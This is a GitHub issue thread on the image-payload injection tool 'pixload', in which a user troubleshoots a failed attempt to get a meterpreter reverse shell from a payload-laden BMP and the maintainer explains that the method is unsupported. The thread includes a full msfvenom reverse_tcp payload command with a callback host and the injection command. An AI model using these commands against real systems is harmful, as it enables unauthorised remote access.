sighook / pixload

Image Payload Creating/Injecting tools
Do What The F*ck You Want To Public License
1.19k stars 237 forks source link

no reverse shell connection. #10

Closed jepunband closed 4 years ago

jepunband commented 4 years ago

hi steps i did was ...

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f raw > payload.php

  2. ./bmp.pl [-payload 'payload.php'] -output payload.bmp [>] Injecting payload into /home/modus/Desktop/payload.bmp [✔] Payload was injected successfully

  3. In metasploit everything is configured the same but no reverse connection when the picture is opened.

is there something i'm doing wrong?

sighook commented 4 years ago

@jepunband Yep, you're trying to inject binary (PE) data into an image and exploit it via the opening. Pixload has many use cases, but unfortunately, this way isn't implemented ;)

See https://github.com/chinarulezzz/pixload#about links for more information.

Kind Regards, A.

jepunband commented 4 years ago

Ok thanks for the info.